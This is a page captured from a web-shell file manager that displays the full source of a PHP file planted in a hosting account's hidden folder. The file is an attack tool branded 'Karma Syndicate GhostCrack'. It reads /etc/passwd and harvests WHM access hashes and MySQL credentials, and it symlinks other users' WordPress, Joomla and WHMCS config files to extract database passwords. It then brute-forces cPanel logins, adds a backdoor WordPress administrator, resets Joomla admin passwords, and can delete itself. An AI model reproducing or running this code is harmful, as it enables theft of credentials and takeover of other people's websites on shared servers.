D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home6
/
cco26461
/
public_html
/
.assets
/
Filename :
60d08bde-2ef3-475b-8223-21f987e3a150.php
back
Copy
<?php error_reporting(0); ini_set('display_errors', 0); ini_set('max_execution_time', 0); if (isset($_GET['action']) && $_GET['action'] === 'delete') { $script_path = $_SERVER['DOCUMENT_ROOT'] . parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); $delete_result = unlink($script_path); $response = [ 'status' => $delete_result ? 'success' : 'error', 'message' => $delete_result ? 'Script deleted successfully' : 'Failed to delete script', 'file_path' => $script_path, 'error' => $delete_result ? null : error_get_last() ]; header('Content-Type: application/json'); echo json_encode($response); exit; } class SecurityTool { private $results = [ 'accesshash' => ['success' => false, 'count' => 0, 'message' => ''], 'cpanel' => ['success' => false, 'count' => 0, 'message' => 'not executed'], 'symlink' => ['success' => false, 'count' => 0, 'message' => 'not executed'], 'bruteforce' => ['success' => false, 'count' => 0, 'message' => 'not executed'], 'wordpress' => ['success' => false, 'count' => 0, 'message' => 'not executed'], 'joomla' => ['success' => false, 'count' => 0, 'message' => 'not executed'] ]; private $results_dir = "ghost_results"; private function ensureResultsDir() { if (!is_dir($this->results_dir)) { @mkdir($this->results_dir, 0755, true); } } private function accessHashFinder() { try { $names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if ($names === false) { $names = [$this->getCurrentUser()]; } $this->ensureResultsDir(); foreach ($names as $name) { $user = explode(':', $name)[0]; $folder = "/home/{$user}/.accesshash"; if (@is_readable($folder)) { $this->results['accesshash']['count']++; $content = str_replace("\n", "", @file_get_contents($folder)); $result_content = "WHM {$user}:{$content}\n"; @file_put_contents("{$this->results_dir}/accesshash_results.txt", $result_content, FILE_APPEND); } } $this->results['accesshash']['success'] = $this->results['accesshash']['count'] > 0; $this->results['accesshash']['message'] = $this->results['accesshash']['success'] ? 'success' : 'failed'; } catch (Exception $e) { $this->results['accesshash']['message'] = 'failed'; } } private function cpFinder() { try { $names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if ($names === false) { $names = [$this->getCurrentUser()]; } $this->ensureResultsDir(); foreach ($names as $name) { $user = explode(':', $name)[0]; $folder = "/home/{$user}/.my.cnf"; if (@is_readable($folder)) { $this->results['cpanel']['count']++; $content = @file_get_contents($folder); $result_content = "User: {$user}\nContent:\n{$content}\n\n"; @file_put_contents("{$this->results_dir}/cpanel_results.txt", $result_content, FILE_APPEND); } } $this->results['cpanel']['success'] = $this->results['cpanel']['count'] > 0; $this->results['cpanel']['message'] = $this->results['cpanel']['success'] ? 'success' : 'failed'; } catch (Exception $e) { $this->results['cpanel']['message'] = 'failed'; } } private function symlinkAndBruteforce() { try { $names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if ($names === false) { $names = [$this->getCurrentUser()]; } if (!@is_dir('ghost_sym')) { @mkdir('ghost_sym', 0755, true); } if (@is_dir('ghost_sym')) { @chdir('ghost_sym'); $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex achon666ju5t.extremecrew\nAddType txt .php\nAddHandler txt .php"; @file_put_contents('.htaccess', $htaccess); } $config_files = [ "wp-config.php", "wp/wp-config.php", "WP/wp-config.php", "wp/beta/wp-config.php", "beta/wp-config.php", "press/wp-config.php", "wordpress/wp-config.php", "Wordpress/wp-config.php", "blog/wp-config.php", "config.php", "news/wp-config.php", "new/wp-config.php", "blogs/wp-config.php", "home/wp-config.php", "db.php", "site/wp-config.php", "main/wp-config.php", "test/wp-config.php", "configuration.php", "blog/configuration.php", "joomla/configuration.php", "cms/configuration.php", "portal/configuration.php", "news/configuration.php", "home/configuration.php", "www/configuration.php", "site/configuration.php", "sites/configuration.php", "vb/includes/config.php", "whm/configuration.php", "central/configuration.php", "whm/whmcs/configuration.php", "whm/WHMCS/configuration.php", "whmc/WHM/configuration.php", "support/configuration.php", "submitticket.php", "whm/configuration.php", "drupal/sites/default/settings.php", "drupal7/sites/default/settings.php", "sites/default/settings.php", "vb/includes/config.php", "includes/config.php", "forum/includes/config.php", "forums/includes/config.php", "cc/includes/config.php", "inc/config.php", "includes/configure.php", "shop/includes/configure.php", "os/includes/configure.php", "oscom/includes/configure.php", "products/includes/configure.php", "cart/includes/configure.php", "inc/conf_global.php", "wp-config.php", "wp/test/wp-config.php", "blog/wp-config.php", "beta/wp-config.php", "portal/wp-config.php", "site/wp-config.php", "wp/wp-config.php", "WP/wp-config.php", "news/wp-config.php", "wordpress/wp-config.php", "test/wp-config.php", "demo/wp-config.php", "home/wp-config.php", "v1/wp-config.php", "v2/wp-config.php", "press/wp-config.php", "new/wp-config.php", "blogs/wp-config.php", "configuration.php", "blog/configuration.php", "submitticket.php", "cms/configuration.php", "beta/configuration.php", "portal/configuration.php", "site/configuration.php", "main/configuration.php", "home/configuration.php", "demo/configuration.php", "test/configuration.php", "v1/configuration.php", "v2/configuration.php", "joomla/configuration.php", "new/configuration.php", "WHMCS/configuration.php", "whmcs1/configuration.php", "whmcs/configuration.php", "WHMC/configuration.php", "whmc/configuration.php", "WHM/configuration.php", "Whm/configuration.php", "whm/configuration.php", "HOST/configuration.php", "Host/configuration.php", "host/configuration.php", "SUPPORTES/configuration.php", "Supportes/configuration.php", "supportes/configuration.php", "domains/configuration.php", "domain/configuration.php", "Hosting/configuration.php", "HOSTING/configuration.php", "hosting/configuration.php", "CART/configuration.php", "Cart/configuration.php", "cart/configuration.php", "ORDER/configuration.php", "Order/configuration.php", "order/configuration.php", "CLIENT/configuration.php", "Client/configuration.php", "client/configuration.php", "CLIENTAREA/configuration.php", "Clientarea/configuration.php", "clientarea/configuration.php", "SUPPORT/configuration.php", "Support/configuration.php", "support/configuration.php", "BILLING/configuration.php", "Billing/configuration.php", "billing/configuration.php", "BUY/configuration.php", "Buy/configuration.php", "buy/configuration.php", "MANAGE/configuration.php", "Manage/configuration.php", "manage/configuration.php", "CLIENTSUPPORT/configuration.php", "ClientSupport/configuration.php", "Clientsupport/configuration.php", "clientsupport/configuration.php", "CHECKOUT/configuration.php", "Checkout/configuration.php", "checkout/configuration.php", "BILLINGS/configuration.php", "Billings/configuration.php", "billings/configuration.php", "BASKET/configuration.php", "Basket/configuration.php", "basket/configuration.php", "SECURE/configuration.php", "Secure/configuration.php", "secure/configuration.php", "SALES/configuration.php", "Sales/configuration.php", "sales/configuration.php", "BILL/configuration.php", "Bill/configuration.php", "bill/configuration.php", "PURCHASE/configuration.php", "Purchase/configuration.php", "purchase/configuration.php", "ACCOUNT/configuration.php", "Account/configuration.php", "account/configuration.php", "USER/configuration.php", "User/configuration.php", "user/configuration.php", "CLIENTS/configuration.php", "Clients/configuration.php", "clients/configuration.php", "BILLINGS/configuration.php", "Billings/configuration.php", "billings/configuration.php", "MY/configuration.php", "My/configuration.php", "my/configuration.php", "secure/whm/configuration.php", "secure/whmcs/configuration.php", "panel/configuration.php", "clientes/configuration.php", "cliente/configuration.php", "support/order/configuration.php", "bb-config.php", "boxbilling/bb-config.php", "box/bb-config.php", "host/bb-config.php", "Host/bb-config.php", "supportes/bb-config.php", "support/bb-config.php", "hosting/bb-config.php", "cart/bb-config.php", "order/bb-config.php", "client/bb-config.php", "clients/bb-config.php", "cliente/bb-config.php", "clientes/bb-config.php", "billing/bb-config.php", "billings/bb-config.php", "my/bb-config.php", "secure/bb-config.php", "support/order/bb-config.php", "includes/dist-configure.php", "zencart/includes/dist-configure.php", "products/includes/dist-configure.php", "cart/includes/dist-configure.php", "shop/includes/dist-configure.php", "includes/iso4217.php", "hostbills/includes/iso4217.php", "host/includes/iso4217.php", "Host/includes/iso4217.php", "supportes/includes/iso4217.php", "support/includes/iso4217.php", "hosting/includes/iso4217.php", "cart/includes/iso4217.php", "order/includes/iso4217.php", "client/includes/iso4217.php", "clients/includes/iso4217.php", "cliente/includes/iso4217.php", "clientes/includes/iso4217.php", "billing/includes/iso4217.php", "billings/includes/iso4217.php", "my/includes/iso4217.php", "secure/includes/iso4217.php", "support/order/includes/iso4217.php" ]; foreach ($names as $name) { $user = explode(':', $name)[0]; foreach ($config_files as $confurl) { $symlink_path = "{$user}~{$confurl}.txt"; if (@symlink("/home/{$user}/public_html/{$confurl}", $symlink_path)) { $this->results['symlink']['count']++; } } } $this->results['symlink']['success'] = $this->results['symlink']['count'] > 0; $this->results['symlink']['message'] = $this->results['symlink']['success'] ? 'success' : 'failed'; if ($this->results['symlink']['success']) { $url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/"; $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30 ]); $response = @curl_exec($curl); if ($response !== false) { preg_match_all('#<a href="([^"]+)"#', $response, $configs); $passwords_list = ''; foreach ($configs[1] as $config) { if (strpos($config, '.txt') !== false) { $file_url = $url . $config; $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => $file_url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30 ]); $content = @curl_exec($curl); @curl_close($curl); if ($content) { $patterns = [ "#'DB_PASSWORD', '(.*?)'#" => 'wordpress', "#password = '(.*?)'#" => 'joomla' ]; foreach ($patterns as $pattern => $type) { if (preg_match($pattern, $content, $match)) { $passwords_list .= $match[1] . "\n"; break; } } } } } } @curl_close($curl); if (!empty($passwords_list)) { $users = array_filter(explode("\n", trim(implode("\n", array_map(function($name) { return explode(':', $name)[0]; }, $names))))); $passwords = array_filter(explode("\n", trim($passwords_list))); $cpanel_found = 0; $this->ensureResultsDir(); foreach ($users as $user) { foreach ($passwords as $pwd) { $connection = @fsockopen('localhost', 2082, $errno, $errstr, 5); if ($connection) { fclose($connection); $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => "http://localhost:2082/login/", CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query(['user' => $user, 'pass' => $pwd]), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_FOLLOWLOCATION => false ]); $response = @curl_exec($curl); if ($response !== false && strpos($response, 'Location: /cpsess') !== false) { $cpanel_found++; @file_put_contents("{$this->results_dir}/bruteforce_results.txt", "User: {$user}\nPassword: {$pwd}\n\n", FILE_APPEND); } @curl_close($curl); } } } $this->results['bruteforce']['success'] = $cpanel_found > 0; $this->results['bruteforce']['count'] = $cpanel_found; $this->results['bruteforce']['message'] = $this->results['bruteforce']['success'] ? 'success' : 'failed'; } else { $this->results['bruteforce']['message'] = 'failed'; } } } catch (Exception $e) { $this->results['symlink']['message'] = 'failed'; $this->results['bruteforce']['message'] = 'failed'; } } private function wpMassUserAdder($symlink_path) { try { if (!$this->results['symlink']['success']) { $this->results['wordpress']['message'] = 'failed'; return; } $url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/"; $curl = curl_init(); curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]); $response = @curl_exec($curl); @curl_close($curl); if ($response === false) { $this->results['wordpress']['message'] = 'failed'; return; } preg_match_all('#<a href="([^"]+)"#', $response, $configs); foreach ($configs[1] as $config) { if (strpos($config, 'wp-config.php.txt') !== false) { @chdir($symlink_path); $curl = curl_init(); curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]); $content = @curl_exec($curl); @curl_close($curl); if ($content) { preg_match("#'DB_HOST', '(.*?)'#", $content, $host); preg_match("#'DB_PASSWORD', '(.*?)'#", $content, $pass); preg_match("#'DB_USER', '(.*?)'#", $content, $user); preg_match("#'DB_NAME', '(.*?)'#", $content, $name); preg_match("#table_prefix\s*= '(.*?)'#", $content, $prefix); if ($host && $user && $pass && $name && $prefix) { $connect = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]); if ($connect) { $prefix = $prefix[1]; $queries = [ "INSERT INTO `{$prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`) VALUES ('GhostCrack', '5ae11ae4c4da98d616377f2c1543f796', 'firstname lastname', 'email@example.com', '0')", "INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (LAST_INSERT_ID(), '{$prefix}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')", "INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (LAST_INSERT_ID(), '{$prefix}user_level', '10')" ]; $success = true; foreach ($queries as $query) { $success = $success && @mysqli_query($connect, $query); } $siteurl_query = @mysqli_query($connect, "SELECT `option_value` FROM `{$prefix}options` WHERE `option_name`='siteurl'"); $siteurl = $siteurl_query ? @mysqli_fetch_array($siteurl_query, MYSQLI_ASSOC)['option_value'] : ''; if ($success && $siteurl) { $this->results['wordpress']['count']++; @file_put_contents("{$this->results_dir}/wordpress_results.txt", "URL: {$siteurl}/wp-login.php\nUsername: GhostCrack\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND); } @mysqli_close($connect); } } } } } $this->results['wordpress']['success'] = $this->results['wordpress']['count'] > 0; $this->results['wordpress']['message'] = $this->results['wordpress']['success'] ? 'success' : 'failed'; } catch (Exception $e) { $this->results['wordpress']['message'] = 'failed'; } } private function joomlaMassUserChanger($symlink_path) { try { if (!$this->results['symlink']['success']) { $this->results['joomla']['message'] = 'failed'; return; } $url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/"; $curl = curl_init(); curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]); $response = @curl_exec($curl); @curl_close($curl); if ($response === false) { $this->results['joomla']['message'] = 'failed'; return; } preg_match_all('#<a href="([^"]+)"#', $response, $configs); foreach ($configs[1] as $config) { if (strpos($config, 'configuration.php.txt') !== false) { @chdir($symlink_path); $curl = curl_init(); curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]); $content = @curl_exec($curl); @curl_close($curl); if ($content) { preg_match('#\$host = \'(.*?)\'#i', $content, $host); preg_match('#\$password = \'(.*?)\'#i', $content, $pass); preg_match('#\$user = \'(.*?)\'#i', $content, $user); preg_match('#\$db = \'(.*?)\'#i', $content, $name); preg_match('#\$dbprefix = \'(.*?)\'#i', $content, $prefix); preg_match("#mailfrom = '(.*?)@(.*?)'#i", $content, $site_url); if ($host && $user && $pass && $name && $prefix && $site_url) { $con = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]); if ($con) { $query = "UPDATE {$prefix[1]}users SET username='administrator', password='5ae11ae4c4da98d616377f2c1543f796'"; if (@mysqli_query($con, $query)) { $this->results['joomla']['count']++; @file_put_contents("{$this->results_dir}/joomla_results.txt", "URL: http://{$site_url[2]}/administrator\nUsername: administrator\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND); } @mysqli_close($con); } } } } } $this->results['joomla']['success'] = $this->results['joomla']['count'] > 0; $this->results['joomla']['message'] = $this->results['joomla']['success'] ? 'success' : 'failed'; } catch (Exception $e) { $this->results['joomla']['message'] = 'failed'; } } private function getCurrentUser() { return function_exists('posix_getpwuid') && function_exists('posix_getuid') ? posix_getpwuid(posix_getuid())['name'] : (isset($_SERVER['USER']) ? $_SERVER['USER'] : 'unknown'); } private function outputResults() { header('Content-Type: text/plain'); echo "=== Karma Syndicate GhostCrack Results ===\n\n"; foreach ($this->results as $key => $result) { echo strtoupper($key) . ": " . $result['message'] . "\n"; } } public function run() { $base_dir = getcwd(); $symlink_path = $base_dir . "/ghost_sym"; $this->accessHashFinder(); @chdir($base_dir); if (!$this->results['accesshash']['success']) { $this->cpFinder(); @chdir($base_dir); $this->symlinkAndBruteforce(); @chdir($base_dir); if ($this->results['symlink']['success']) { $this->wpMassUserAdder($symlink_path); @chdir($base_dir); $this->joomlaMassUserChanger($symlink_path); @chdir($base_dir); } } $this->outputResults(); } } $tool = new SecurityTool(); $tool->run();